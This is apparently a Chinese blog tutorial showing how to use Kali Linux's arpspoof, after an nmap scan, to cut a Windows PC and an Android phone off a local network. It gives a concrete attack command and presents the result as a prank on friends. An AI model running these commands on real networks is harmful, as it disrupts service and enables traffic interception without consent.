Kali Linux ARP欺骗攻击局域网
首先
什么是ARP欺骗?
ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。最早探讨ARP欺骗的文章是由Yuri Volobuev所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection games),转自百度百科。
准备工具
1.一台装有Kali Linux系统的虚拟机。
VMware Workstation Pro 16(虚拟机)
下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html
Kali Linux 2021(系统)
下载地址:https://www.kali.org/downloads/
2.一台物理机作为靶机,电脑或者手机都可以。
这里物理机使用win10 系统,手机系统为Android 11系统
3.一个局域网。
将他们布置在同一个局域网下
1.物理机
让电脑连上局域网,使用ipconfig
命令查看IP地址。
手机的话也同样,我这里使用虚拟终端Termux的ifconfig
命令查看IP地址,注意ipconfig和ifconfig的区别,别用混了。
发现了两个IP地址,这是因为我手机开着双WLAN加速(2.4G/5G),没有影响。
2.虚拟机
重点来了,设置虚拟机的网络,使他们可以在同一网段,参考这这位大佬的文章kali虚拟机设置网络连接
设置完成后,使用ifconfig
命令查看Kali Linux的IP地址
测试网络环境
使用ping命令测试他们能否互相访问
ping语法
ping 目标主机IP
Ctrl+C可停止ping。
物理机成功
虚拟机成功
局域网扫描
使用nmap
命令扫描该局域网下的所有在线主机。
语法
Nmap -sP <网络地址> </ CIDR>
可以看到几个熟悉的IP,获得了IP之后剩下的事情就很简单了。
ARP欺骗使物理机断网
arpspoof语法
arpspoof -i 本机网卡 -t 目标IP地址 伪装IP
Ctrl+C可停止ARP攻击。
arpspoof -i eth0 -t 10.5.56.118 10.5.56.1
开启ARP欺骗攻击后
效果非常明显,此时物理机在该网络已经无法继续上网,直到kali虚拟机停止攻击才能恢复。
再用同样的方法攻击一下手机试试。
可以发现手机也无法上网了。
结束语
这真是简洁方便、高效快捷、居家旅行、整蛊好友之良方啊。
但是,Kali Linux是比较危险的操作系统,使用时还须谨慎,不要把自己整进去吃国粮哦。